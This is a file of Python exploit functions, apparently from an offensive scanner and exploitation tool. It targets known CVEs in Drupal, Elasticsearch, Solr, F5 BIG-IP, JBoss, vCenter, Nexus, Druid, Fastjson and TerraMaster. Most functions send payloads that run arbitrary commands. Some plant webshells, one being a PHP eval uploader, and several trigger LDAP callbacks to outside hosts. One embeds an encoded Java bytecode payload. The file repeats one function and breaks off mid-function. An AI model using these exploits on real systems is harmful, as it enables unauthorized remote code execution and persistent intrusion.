def check_vulnerable_7(base_url):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = get_random_string()
cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r)))
url = base_url + '/user/password?name[%23post_render][0]=exec&name[%23markup]={0}'.format(cmd)
data = 'form_build_id=&form_id=user_pass&_triggering_element_name=name&_triggering_element_value='
resp = requests.post(url, data, headers=headers, verify=False)
if resp.status_code != 200:
return False
soup = BeautifulSoup(resp.content, 'lxml')
form_build_id = soup.find('input', {'name': 'form_build_id'}).get('value')
url = base_url + '/file/ajax/name/%23value/' + form_build_id
data = 'form_build_id={0}'.format(form_build_id)
resp = requests.post(url, data, headers=headers, verify=False)
if r in str(resp.content):
return True
return False
def cve_2014_3120_exp(self, cmd):
vul_name = "Elasticsearch: CVE-2014-3120"
self.data_send_info = r'''{ "name": "cve-2014-3120" }'''
self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd)
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
self.r = list(json.loads(
self.req.text)["hits"]["hits"])[0]["fields"]["command"][0]
except:
self.r = "null"
raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(self.r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def check_vulnerable_7(base_url):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = get_random_string()
cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r)))
url = base_url + '/user/password?name[%23post_render][0]=exec&name[%23markup]={0}'.format(
cmd)
data = 'form_build_id=&form_id=user_pass&_triggering_element_name=name&_triggering_element_value='
resp = requests.post(url, data, headers=headers, verify=False)
if resp.status_code != 200:
return False
soup = BeautifulSoup(resp.content, 'lxml')
form_build_id = soup.find('input', {'name': 'form_build_id'}).get('value')
url = base_url + '/file/ajax/name/%23value/' + form_build_id
data = 'form_build_id={0}'.format(form_build_id)
resp = requests.post(url, data, headers=headers, verify=False)
if r in str(resp.content):
return True
return False
def getshell(self, url):
'''
TerraMaster 文件上传GetShell函数
:param url: TerraMaster url地址
:return: 返回得到的shell地址
'''
exp_url = url + 'include/upload.php?targetDir=../cgi-bin/filemanage/'
headers = {
'User-Agent':
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
}
filename = 'safe.php'
with open(filename, 'wb') as fp:
fp.write('<?php @eval($_POST[mosin]);?>')
files = {
'Filename': (None, filename),
'name': (None, filename),
'chunk': (None, '0'),
'chunks': (None, '1'),
'file': (filename, open(filename,
'rb'), 'application/octet-stream'),
'Upload': (None, '给老子上!')
}
try:
requests.post(exp_url, files=files, headers=headers)
shell = url + 'cgi-bin/filemanage/' + filename
reqcode = requests.get(shell, headers=headers).status_code
except Exception, msg:
print '\n[x] ERROR!!!:', msg
def fastjson(self, webapps_identify, url):
name = "Fastjson"
Identify.identify_prt(name)
dns = dns_request()
payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' %dns
payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' %dns
payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' %dns
payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' %dns
payload5 = '{"a":"'
headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'}
try:
try:
request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False)
except:
pass
if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text:
if r"application/json" == request.headers['Content-Type']:
webapps_identify.append("fastjson")
elif r"application/json" in request.headers['Content-Type']:
webapps_identify.append("fastjson")
else:
requests.post(url, data=payload1, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload2, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload3, headers=headers, timeout=self.timeout, verify=False)
requests.post(url, data=payload4, headers=headers, timeout=self.timeout, verify=False)
if dns_result(dns):
webapps_identify.append("fastjson")
webapps_identify.append("fastjson [" + dns + "]")
except Exception as error:
pass
def cve_2014_3120_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Elasticsearch: CVE-2014-3120"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2014_3120.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2014-3120"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2014-04-29"
self.vul_info["vul_vers"] = "< 1.2"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "命令执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Elasticsearch 1.2之前的默认配置启用动态脚本编制,该脚本允许远程攻击者通过_search的source" \
"参数执行任意MVEL表达式和Java代码。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
self.data_send_info = r'''{ "name": "cve-2014-3120" }'''
md = random_md5()
cmd = "echo " + md
self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd)
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
self.r = list(json.loads(
self.req.text)["hits"]["hits"])[0]["fields"]["command"][0]
except:
self.r = "null"
if md in self.r:
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] "
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2017_12629_exp(self, cmd):
vul_name = "Apache Solr: CVE-2017-12629"
core_name = "null"
new_core = random_md5()
payload1 = self.payload_cve_2017_12629.replace(
"RECOMMAND", cmd).replace("new_core", new_core)
payload2 = '[{"id": "test"}]'
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
headers_solr1 = {
'Host': "localhost",
'Accept': "*/*",
'User-Agent': self.ua,
'Connection': "close"
}
headers_solr2 = {
'Host': "localhost",
'Accept-Language': "en",
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/json"
}
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
req = requests.post(self.url + "/solr/" + str(core_name) +
"/config",
data=payload1,
headers=headers_solr1,
timeout=self.timeout,
verify=False)
request = requests.post(self.url + "/solr/" + str(core_name) +
"/update",
data=payload2,
headers=headers_solr2,
timeout=self.timeout,
verify=False)
raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
r = "Command Executed Successfully (But No Echo)"
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2020_13942_exp(self, cmd):
self.threadLock.acquire()
vul_name = "Apache Unomi: CVE-2020-13942"
self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
self.headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Content-Type': 'application/json'
}
try:
req = requests.post(self.url + "/context.json",
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
r = "Command Executed Successfully (But No Echo)"
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2021_22986_exp(self, cmd):
vul_name = "F5 BIG-IP: CVE-2021-22986"
headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Authorization': 'Basic YWRtaW46',
'X-F5-Auth-Token': '',
'Content-Type': 'application/json'
}
data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
"RECOMMAND", cmd)
url = urljoin(self.url, "/mgmt/tm/util/bash")
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = json.loads(request.text)["commandResult"]
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def cve_2019_6340_exp(self, cmd):
vul_name = "Drupal: CVE-2019-6340"
self.path = "/node/?_format=hal_json"
self.cmd_len = len(cmd)
self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
self.url)
self.headers = {
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/hal+json",
'Accept': "*/*",
'Cache-Control': "no-cache"
}
try:
request = requests.post(self.url + self.path,
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def fastjson_1224_2_exp(self, cmd):
vul_name = "Fastjson: VER-1224-2"
headers = {
'User-Agent': self.ua,
'Content-Type': 'application/json',
'Testcmd': cmd,
'Connection': 'close'
}
data = {
"@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
"_bytecodes": [
"yv66vgAAADMA6wEAHnlzb3NlcmlhbC9Qd25lcjk0NDQ5MTgyMDEzMzcwMAcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQAZUHduZXI5NDQ0OTE4MjAxMzM3MDAuamF2YQEACXdyaXRlQm9keQEAFyhMamF2YS9sYW5nL09iamVjdDtbQilWAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rCAAJAQAPamF2YS9sYW5nL0NsYXNzBwALAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAA0ADgoADAAPAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwAEQASCgAMABMBAAhzZXRCeXRlcwgAFQEAAltCBwAXAQARamF2YS9sYW5nL0ludGVnZXIHABkBAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsMABsAHAkAGgAdAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DAAfACAKAAwAIQEABjxpbml0PgEABChJKVYMACMAJAoAGgAlAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwAnAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAApACoKACgAKwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwALQAuCgAEAC8BAAdkb1dyaXRlCAAxAQAJZ2V0TWV0aG9kDAAzACAKAAwANAEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwA2AQATamF2YS5uaW8uQnl0ZUJ1ZmZlcggAOAEABHdyYXAIADoBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwA8AQAEQ29kZQEACkV4Y2VwdGlvbnMBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwBAAQANU3RhY2tNYXBUYWJsZQEABWdldEZWAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DABFAEYKAAwARwEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcASQEADWdldFN1cGVyY2xhc3MMAEsALgoADABMAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAjAE4KAEoATwEAImphdmEvbGFuZy9yZWZsZWN0L0FjY2Vzc2libGVPYmplY3QHAFEBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwAUwBUCgBSAFUBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcAVwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABZAFoKAFgAWwEAEGphdmEvbGFuZy9TdHJpbmcHAF0BAAMoKVYMACMAXwoABABgAQAQamF2YS9sYW5nL1RocmVhZAcAYgEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwAZABlCgBjAGYBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsMAGgAaQoAYwBqAQAHdGhyZWFkcwgAbAwAQwBECgACAG4BABNbTGphdmEvbGFuZy9UaHJlYWQ7BwBwAQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7DAByAHMKAGMAdAEABGV4ZWMIAHYBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwAeAB5CgBeAHoBAARodHRwCAB8AQAGdGFyZ2V0CAB+AQASamF2YS9sYW5nL1J1bm5hYmxlBwCAAQAGdGhpcyQwCACCAQAHaGFuZGxlcggAhAEABmdsb2JhbAgAhgEACnByb2Nlc3NvcnMIAIgBAA5qYXZhL3V0aWwvTGlzdAcAigEABHNpemUBAAMoKUkMAIwAjQsAiwCOAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABZAJALAIsAkQEAA3JlcQgAkwEAC2dldFJlc3BvbnNlCACVAQAJZ2V0SGVhZGVyCACXAQAIVGVzdGVjaG8IAJkBAAdpc0VtcHR5AQADKClaDACbAJwKAF4AnQEACXNldFN0YXR1cwgAnwEACWFkZEhlYWRlcggAoQEAB1Rlc3RjbWQIAKMBAAdvcy5uYW1lCAClAQAQamF2YS9sYW5nL1N5c3RlbQcApwEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAKkAqgoAqACrAQALdG9Mb3dlckNhc2UMAK0AcwoAXgCuAQAGd2luZG93CACwAQAHY21kLmV4ZQgAsgEAAi9jCAC0AQAHL2Jpbi9zaAgAtgEAAi1jCAC4AQARamF2YS91dGlsL1NjYW5uZXIHALoBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIHALwBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWDAAjAL4KAL0AvwEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7DADBAMIKAL0AwwEAEWphdmEvbGFuZy9Qcm9jZXNzBwDFAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwwAxwDICgDGAMkBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMACMAywoAuwDMAQACXEEIAM4BAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsMANAA0QoAuwDSAQAEbmV4dAwA1ABzCgC7ANUBAAhnZXRCeXRlcwEABCgpW0IMANcA2AoAXgDZDAAHAAgKAAIA2wEADWdldFByb3BlcnRpZXMBABgoKUxqYXZhL3V0aWwvUHJvcGVydGllczsMAN0A3goAqADfAQATamF2YS91dGlsL0hhc2h0YWJsZQcA4QEACHRvU3RyaW5nDADjAHMKAOIA5AEAE1tMamF2YS9sYW5nL1N0cmluZzsHAOYBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwDoCgDpAGAAIQACAOkAAAAAAAMACgAHAAgAAgA+AAABLwAIAAUAAAD2Egq4ABBOLbYAFE0tEhYGvQAMWQMSGFNZBLIAHlNZBbIAHlO2ACIsBr0ABFkDK1NZBLsAGlkDtwAmU1kFuwAaWSu+twAmU7YALFcqtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAI06BBI5uAAQTi0SOwS9AAxZAxIYU7YAIi0EvQAEWQMrU7YALE0qtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAEg6BBI5uAAQTi0SOwS9AAxZAxIYU7YAIi0EvQAEWQMrU7YALE0qtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAAOxAAIAAABoAGsANwAAAGgAsAA9AAEAQgAAABcAA/cAawcAN/cARAcAPf0ARAcABAcADAA/AAAABAABAEEACgBDAEQAAgA+AAAAfgADAAUAAAA/AU0qtgAwTqcAGS0rtgBITacAFqcAADoELbYATU6nAAMtEgSm/+csAaYADLsASlkrtwBQvywEtgBWLCq2AFywAAEACgATABYASgABAEIAAAAlAAb9AAoHAFgHAAwI/wACAAQHAAQHAF4HAFgHAAwAAQcASgkFDQA/AAAABAABAEEAAQAjAF8AAgA+AAADNgAIAA0AAAI/KrcA6gM2BLgAZ7YAaxJtuABvwABxOgUDNgYVBhkFvqICHxkFFQYyOgcZBwGmAAanAgkZB7YAdU4tEne2AHuaAAwtEn22AHuaAAanAe4ZBxJ/uABvTCvBAIGaAAanAdwrEoO4AG8ShbgAbxKHuABvTKcACzoIpwHDpwAAKxKJuABvwACLOgkDNgoVChkJuQCPAQCiAZ4ZCRUKuQCSAgA6CxkLEpS4AG9MK7YAMBKWA70ADLYANSsDvQAEtgAsTSu2ADASmAS9AAxZAxJeU7YANSsEvQAEWQMSmlO2ACzAAF5OLQGlAAottgCemQAGpwBYLLYAMBKgBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcstgAwEqIFvQAMWQMSXlNZBBJeU7YANSwFvQAEWQMSmlNZBC1TtgAsVwQ2BCu2ADASmAS9AAxZAxJeU7YANSsEvQAEWQMSpFO2ACzAAF5OLQGlAAottgCemQAGpwCNLLYAMBKgBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcSprgArLYArxKxtgB7mQAYBr0AXlkDErNTWQQStVNZBS1TpwAVBr0AXlkDErdTWQQSuVNZBS1TOgwsuwC7WbsAvVkZDLcAwLYAxLYAyrcAzRLPtgDTtgDWtgDauADcBDYELQGlAAottgCemQAIFQSaAAanABAsuADgtgDltgDauADcFQSZAAanAAmECgGn/lwVBJkABqcACYQGAaf937EAAQBfAHAAcwBBAAEAQgAAAN0AGf8AGgAHBwACAAAAAQcAcQEAAPwAFwcAY/8AFwAIBwACAAAHAF4BBwBxAQcAYwAAAv8AEQAIBwACBwAEAAcAXgEHAHEBBwBjAABTBwBBBP8AAgAIBwACBwAEAAcAXgEHAHEBBwBjAAD+AA0ABwCLAf8AYwAMBwACBwAEBwAEBwBeAQcAcQEHAGMABwCLAQcABAAAAvsAVC4C+wBNUQcA5ykLBAIMB/8ABQALBwACBwAEAAcAXgEHAHEBBwBjAAcAiwEAAP8ABwAIBwACAAAAAQcAcQEHAGMAAPoABQA/AAAABAABAEEAAQAFAAAAAgAG"
],
"_name": "lightless",
"_tfactory": {
},
"_outputProperties": {
}
}
data = json.dumps(data)
try:
request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2015_7501_exp(self, cmd):
vul_name = "RedHat JBoss: CVE-2015-7501"
self.path = "/invoker/JMXInvokerServlet"
self.headers = {
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'User-Agent': self.ua,
"Connection": "close"
}
try:
self.req = requests.post(self.url + self.path,
data=self.payload_cve_2015_7501,
headers=self.headers,
timeout=self.timeout,
verify=False)
time.sleep(0.5)
self.cmd = urlencode({"ppp": cmd})
self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
self.cmd,
headers=self.headers,
timeout=self.timeout,
verify=False)
r = self.url + "/jexinv4/jexinv4.jsp?" + self.cmd
r += "\n"
r += self.request.text
self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2021_21972_exp(self, cmd, os_type):
vul_name = "Vmware vCenter: CVE-2021-21972"
headers = {
"User-Agent": self.ua,
"Accept": "*/*",
"Connection": "close"
}
try:
cmd = cmd
path = os.path.split(os.path.realpath(sys.argv[0]))[0]
if os_type == "linux":
shell_tar = path + "/payload/payload/cve202121972_linux_shell.tar"
else:
shell_tar = path + "/payload/payload/cve202121972_windows_shell.tar"
file = {'uploadFile': open(shell_tar, 'rb')}
url = requests.compat.urljoin(
self.url, "/ui/vropspluginui/rest/services/uploadova")
req = requests.post(url,
files=file,
headers=headers,
timeout=self.timeout,
verify=False)
url = requests.compat.urljoin(self.url, "/ui/resources/shell.jsp")
r = "Payload: " + shell_tar + "\n" + "Behiner jsp webshell (default password:rebeyond) : " + url
self.raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
verify.exploit_print(r, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception as e:
verify.error_print(vul_name)
def fastjson_1224_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.24"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2017-18349"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2017-03-15"
self.vul_info["vul_vers"] = "<= 1.2.24"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
self.vul_info["cre_date"] = "2021-01-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Content-Type': "application/json",
'Connection': 'close'
}
md = dns_request()
dns = md
data = {
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://" + dns + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25646_exp(self, cmd):
vul_name = "Apache Druid: CVE-2021-25646"
url = urljoin(self.url, "/druid/indexer/v1/sampler")
headers = {
'Content-Type': 'application/json',
'User-Agent': self.ua,
'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
'Connection': 'keep-alive'
}
data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = "Command Executed Successfully (But No Echo)"
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def hyuga_co():
headers_hyuga = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language':
'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6'
}
hyuga_api = "http://api.hyuga.co/v1/users"
hyuga_host = globals.get_value("hyuga_domain")
hyuga_token = globals.get_value("hyuga_token")
try:
if r"xxxxxx" in hyuga_host: # 如果没有指定域名和token,就自动获取, 第一次获取token
if r"xxxxxx" in hyuga_token:
dns = requests.post(hyuga_api,
headers=headers_hyuga,
timeout=timeout,
verify=False)
hyuga_host = json.loads(dns.text)["data"]["identity"]
dns_host = random_md5() + "." + str(hyuga_host)
hyuga_token = json.loads(dns.text)["data"]["token"]
globals.set_value("hyuga_token", hyuga_token)
globals.set_value("hyuga_domain", hyuga_host)
return dns_host
else:
return "bug"
else:
dns_host = random_md5() + "." + hyuga_host
return dns_host
except Exception as e:
pass
def fastjson_1247_exp(self, rmi_ldap):
vul_name = "Fastjson: VER-1247"
headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
data = {
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": rmi_ldap,
"autoCommit": True
}
}
data = json.dumps(data)
try:
request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
r = "Command Executed Successfully (But No Echo)"
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2020_10199_exp(self, cmd, u, p):
vul_name = "Nexus Repository Manager: CVE-2020-10199"
self.session_headers = {
'Connection': 'keep-alive',
'X-Requested-With': 'XMLHttpRequest',
'X-Nexus-UI': 'true',
'User-Agent': self.ua
}
try:
self.us = base64.b64encode(str.encode(u))
self.pa = base64.b64encode(str.encode(p))
self.base64user = self.us.decode('ascii')
self.base64pass = self.pa.decode('ascii')
self.session_data = {
'username': self.base64user,
'password': self.base64pass
}
self.request = requests.post(self.url + "/service/rapture/session",
data=self.session_data,
headers=self.session_headers,
timeout=20)
self.session_str = str(self.request.headers)
self.session = (re.search(r"NXSESSIONID=(.*); Path",
self.session_str).group(1))
self.rce_headers = {
'Connection': "keep-alive",
'NX-ANTI-CSRF-TOKEN': "0.6153568974227819",
'X-Requested-With': "XMLHttpRequest",
'X-Nexus-UI': "true",
'Content-Type': "application/json",
'404': "" + cmd + "",
'User-Agent': self.ua,
'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \
"NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + ""
}
request = requests.post(self.url +
"/service/rest/beta/repositories/go/group",
data=self.payload_cve_2020_10199,
headers=self.rce_headers)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cve_2019_0193_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2019-0193"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2019-10-16"
self.vul_info["vul_vers"] = "< 8.2.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
"在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
self.vul_info["cre_auth"] = "zhzyker"
core_name = "null"
md = random_md5()
cmd = "echo " + md
payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8'))
solrhost = self.hostname + ":" + str(self.port)
headers = {
'Host': "" + solrhost,
'User-Agent': self.ua,
'Accept': "application/json, text/plain, */*",
